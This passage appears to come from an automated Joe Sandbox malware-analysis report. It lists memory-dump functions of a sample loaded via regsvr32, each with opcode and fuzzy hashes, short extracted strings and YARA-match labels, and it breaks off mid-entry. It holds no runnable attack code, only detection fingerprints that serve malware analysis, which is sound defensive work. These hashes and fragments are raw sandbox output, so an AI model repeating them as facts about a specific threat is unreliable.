                                                                    • Opcode Fuzzy Hash: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                                    • Instruction Fuzzy Hash: 28612D71A04B0C8FDBA9DF98D08A7DEB7F1FB48344F004119E406E7291DBB8990ADB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "C$*6TO
                                                                    • API String ID: 0-2251823003
                                                                    • Opcode ID: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                                    • Instruction ID: 1108d3b1afe4df31317b10417d35e55e698c36e02fd161062712c06e930ceb12
                                                                    • Opcode Fuzzy Hash: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                                    • Instruction Fuzzy Hash: 598166B550130DCFCB98DF28C58A59D3BA8FB49308F40812AFC1E9A264D3B4E659DB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _ N$nkz
                                                                    • API String ID: 0-4083044659
                                                                    • Opcode ID: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                                    • Instruction ID: b07831c94fe2cbd7ac58294498593f0ee6961182af88fd212fccb4805bec53d6
                                                                    • Opcode Fuzzy Hash: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                                    • Instruction Fuzzy Hash: 39513971D04A1D8BDF99CFA8C5457EEBBB1FB48344F108119E415BB250CBB89A09CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LiD+$?
                                                                    • API String ID: 0-3739020763
                                                                    • Opcode ID: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                                    • Instruction ID: 2f7d624153028320349e4a0adb7356b45dc1f3746b227896fac10cb383cb0630
                                                                    • Opcode Fuzzy Hash: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                                    • Instruction Fuzzy Hash: F35191B590034E8FCB48DF64D48A8DE7FB0FB68398F214619E815A7210D7B496A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %&Iv$\o
                                                                    • API String ID: 0-2950252169
                                                                    • Opcode ID: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                                    • Instruction ID: 7d8516b09fccf329ce1ee45da69bc8f76dfc96f1b67d05b04ebb17f55f6537e3
                                                                    • Opcode Fuzzy Hash: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                                    • Instruction Fuzzy Hash: 7041C2B090074E8FCB48DF28C88A4DE7FB1FB68398F514619EC56A7250D7B496A4CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |<$P;
                                                                    • API String ID: 0-71676942
                                                                    • Opcode ID: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                                    • Instruction ID: b926ab4478da67f81816527f76e4a4189747c2b1a61b322854fb240660ec53f5
                                                                    • Opcode Fuzzy Hash: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                                    • Instruction Fuzzy Hash: 0F41F4B190078ECFCF48DF68C88A5DE7BB0FB58318F10461DE82AA6250D3B49665CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$< @
                                                                    • API String ID: 0-1734357072
                                                                    • Opcode ID: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                                    • Instruction ID: 53d5526a666e2e4b0aa3df313d94281727ef5dde582db7952040e92a2ea044da
                                                                    • Opcode Fuzzy Hash: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                                    • Instruction Fuzzy Hash: E241C3B090078E8FCF48DF68C95A5DE7BB0FB58348F104A1DEC6AA6250D3B49665CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$X&x
                                                                    • API String ID: 0-2125001607
                                                                    • Opcode ID: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                                    • Instruction ID: 406be0e8b3d674fc45ad7aec45ce8f3a41fae9dcbe4fb503a73b8d88e4a7390b
                                                                    • Opcode Fuzzy Hash: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                                    • Instruction Fuzzy Hash: F541C3B190034E8BDF48DF68C98A4DE7BB1FB58358F00461DE866AB350D3B89665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D-o$S1
                                                                    • API String ID: 0-2248371139
                                                                    • Opcode ID: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                                    • Instruction ID: c824313cc5550ea8d08e24e936909b38c1116e4b52b8e35a6cfdfb4e8fb0d5b5
                                                                    • Opcode Fuzzy Hash: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                                    • Instruction Fuzzy Hash: 7F418F7090074E8FCF88CF68C48A5DEBFB0FB28398F144619E856A6250D3B496A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ")v$kNTY
                                                                    • API String ID: 0-925696221
                                                                    • Opcode ID: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                                    • Instruction ID: 3d1cde25fc61112586e0ccbc864a2b9889115514f3b9559dcc74a8c2fbc402f5
                                                                    • Opcode Fuzzy Hash: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                                    • Instruction Fuzzy Hash: 49317CB16187858B8348DF28C45641ABBE1FBCD70CF544B2DF4CAAB251D738D6128B4B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O$\u
                                                                    • API String ID: 0-3775190597
                                                                    • Opcode ID: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                                    • Instruction ID: b3d17dff366e7d439aca65bd494037a1e9e1cb33d0f26cc5f3c7e2fad645fe6e
                                                                    • Opcode Fuzzy Hash: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                                    • Instruction Fuzzy Hash: 5B31C4B0528781AFC798DF28D09991ABBF1FBC9304F806A1DF98A8B350D774D845CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +N$:s[
                                                                    • API String ID: 0-2992701377
                                                                    • Opcode ID: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                                    • Instruction ID: 2af45dfac4c7ae0da7497fa8c295952f08e7f96bebb69c710dc1a077a3b8364b
                                                                    • Opcode Fuzzy Hash: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                                    • Instruction Fuzzy Hash: 443192B5528381ABC388DF28C48A81FBBE1FBC9359F806A1DF8C696261D734D5458B43
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 'yN$k
                                                                    • API String ID: 0-35230329
                                                                    • Opcode ID: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                                    • Instruction ID: 07b651401a32326000ca6cd35722393aebb0696fbf8e2d5e5a89f081ef8d3ba1
                                                                    • Opcode Fuzzy Hash: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                                    • Instruction Fuzzy Hash: DE318FB191478E8BDB48DF68D8494DF3BF0FB58308F004A29EC6A9A250D7B49664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ]2F$lt
                                                                    • API String ID: 0-3307743551
                                                                    • Opcode ID: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                                    • Instruction ID: b2e8e3d622355c2c7a8d87ad16832996e77f732c72c2020fcd3ed114b96953d1
                                                                    • Opcode Fuzzy Hash: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                                    • Instruction Fuzzy Hash: BC218C70528385ABC798CF24C1CA94BBBE1FBD4758F906A0DF8828B264D774D909CB43
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: t2i.
                                                                    • API String ID: 0-2317288456
                                                                    • Opcode ID: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                                    • Instruction ID: 45fd1b4f7d9ae1bb3a1595fd0447dfa3858b4c22850e921c91e36994c5fa5290
                                                                    • Opcode Fuzzy Hash: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                                    • Instruction Fuzzy Hash: F4C17C709197489BD7D6DF18C48579EBBE0FB88344F906A1EF486C72A0CB34DA49CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !
                                                                    • API String ID: 0-133318149
                                                                    • Opcode ID: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                                    • Instruction ID: 4d490125f0736c0523a0bc8c54046deb818a488a36854fcf26dc18eb231edbc7
                                                                    • Opcode Fuzzy Hash: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                                    • Instruction Fuzzy Hash: 94C1277090474D8BDF48DF68C88A6EE7BF1FB48358F15821DE84AA7250C7789949CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GP
                                                                    • API String ID: 0-809347306
                                                                    • Opcode ID: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                                    • Instruction ID: b8cc07b6ee5f07dffcf88ae53723e0b0b514af2364763fc1c4f878c703b2f424
                                                                    • Opcode Fuzzy Hash: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                                    • Instruction Fuzzy Hash: 35C18BB190060DCFCF68CF78D55A59D7BF1BB48308F606229F826AA2A2D3B49915CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: G
                                                                    • API String ID: 0-4067352199
                                                                    • Opcode ID: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                                    • Instruction ID: 225e36911d9d240547ab15c987b60d96220a9315f181ed6db9e7231e26a901aa
                                                                    • Opcode Fuzzy Hash: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                                    • Instruction Fuzzy Hash: 54A11871A0460CCFDF59DFA8C44A6DDB7F2FB48344F104529E816BB261CB749909CBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :d
                                                                    • API String ID: 0-1981401805
                                                                    • Opcode ID: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                                    • Instruction ID: 210e0c3814bb066ec4f0600647a6f8918949d15d236ac433349e910c02a539df
                                                                    • Opcode Fuzzy Hash: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                                    • Instruction Fuzzy Hash: 55B1067150560DDFCB88DF28C089ADE7BE0FF58308F825229F80AA7255D774DA98DB49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 'NL
                                                                    • API String ID: 0-130891299
                                                                    • Opcode ID: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                                    • Instruction ID: bb2c5b98f4e45d76fdff147334347c6d164a6d6c8cf2b5048c0250209dce3a22
                                                                    • Opcode Fuzzy Hash: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                                    • Instruction Fuzzy Hash: 08816770900748CFDB99CF68C4896DE7BF0FB48394F609129F94697261C774D989CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ETz
                                                                    • API String ID: 0-3877082699
                                                                    • Opcode ID: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                                    • Instruction ID: db1a2cf02a49f3c5a1febdf95057c2803ba9c7043f43a3a74a84a847f8708688
                                                                    • Opcode Fuzzy Hash: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                                    • Instruction Fuzzy Hash: 6281BC34A0674CCBDB65CFA8C0897CDBBF1FF68348F104119E915AA2A6CB70D559CB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #;*z
                                                                    • API String ID: 0-1682342327
                                                                    • Opcode ID: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                                    • Instruction ID: dbf9c55ae058a2f54c24d1eac6a5ff2fe61b468a3017e99be0a6ffbf3af3057b
                                                                    • Opcode Fuzzy Hash: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                                    • Instruction Fuzzy Hash: EF91E0715042888FCBB9DF24D88A7DA7BA1FB45348F50C229D88ECE261DFB0564DDB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dQ
                                                                    • API String ID: 0-4190919517
                                                                    • Opcode ID: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                                    • Instruction ID: 9d729ecabb7b74207a0fd84f221a36cedb2a9a3a0e5d95724699f54aa2ea8075
                                                                    • Opcode Fuzzy Hash: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                                    • Instruction Fuzzy Hash: 3E71E7711187988BDBFDCF28CC857D97BA6FB44744F20811CE84E8E261DB749A89CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )0
                                                                    • API String ID: 0-1029681778
                                                                    • Opcode ID: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                                    • Instruction ID: 121df312e681884aeaf9abe1505228ce9ff72d97cb51e4d07d955d8bff2ee376
                                                                    • Opcode Fuzzy Hash: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                                    • Instruction Fuzzy Hash: 6851673861660CCBDB69DF78D4852E93BE0FF69344F20402DFC6687266DB34D52A8B58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Uerm
                                                                    • API String ID: 0-3179360214
                                                                    • Opcode ID: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                                    • Instruction ID: 041d59295089493447bb19a8378e04636211af5195b78f50b28b80e802418f55
                                                                    • Opcode Fuzzy Hash: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                                    • Instruction Fuzzy Hash: AD6103B190061A8FCF48DFA8C48A5EEBBB1FB58344F10822DE815AB365C7749A55CFD4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: n?,#
                                                                    • API String ID: 0-1323099997
                                                                    • Opcode ID: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                                    • Instruction ID: 565b854ac311e8ede55e0f860d8d3b50ebc6ea35409b62ec986654d35b43713b
                                                                    • Opcode Fuzzy Hash: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                                    • Instruction Fuzzy Hash: 4461F97054878DCBEBBADE38C8897D937B0FB48344F908529E94E8E290DB749A458B45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NRx
                                                                    • API String ID: 0-1393999616
                                                                    • Opcode ID: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                                    • Instruction ID: 7c3eed2061eb3ea8b6bf0d1c70d9a16e0a2e2a77544f255897bb26607a47427d
                                                                    • Opcode Fuzzy Hash: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                                    • Instruction Fuzzy Hash: 46416C706197489BD3E5DF28C08679FBAE0FB88745F90A92DF585C32A1CB74C9488B43
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {dN
                                                                    • API String ID: 0-923835543
                                                                    • Opcode ID: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                                    • Instruction ID: f9e1d774cd1a5aafce577d99eb21246fb33c51757267e19de4f8e3655d4c3e4d
                                                                    • Opcode Fuzzy Hash: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                                    • Instruction Fuzzy Hash: A24118B091470D8BCF48DFA8C58A1DEBFB1FB483A8F25521DE90AB6250C7749585CF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: hT
                                                                    • API String ID: 0-434349927
                                                                    • Opcode ID: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                                    • Instruction ID: 79a86a43dda6c0bf54cad5f70c675ce2074b99fb8c760d3b3e2f6daa19ea02a9
                                                                    • Opcode Fuzzy Hash: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                                    • Instruction Fuzzy Hash: 2A5190B190038E8BCB48DF68C88A5DE7BB0FB58308F104A19FC65A6250D7B4D669CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: w.
                                                                    • API String ID: 0-4252102657
                                                                    • Opcode ID: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                                    • Instruction ID: ff83c9861e3aef96e788ade2e95c5d31a765335f039db5447ff320373d52f62b
                                                                    • Opcode Fuzzy Hash: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                                    • Instruction Fuzzy Hash: 524127B190434A8BCF48DF64C88A4DE7FB1FB58348F10861DEC5AA7250D7749659CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \>
                                                                    • API String ID: 0-4115654482
                                                                    • Opcode ID: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                                    • Instruction ID: c8bfe62f06df19f0db5cc8e5fd5c20be0a97c60a2c34a345c5b0509f61aa275d
                                                                    • Opcode Fuzzy Hash: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
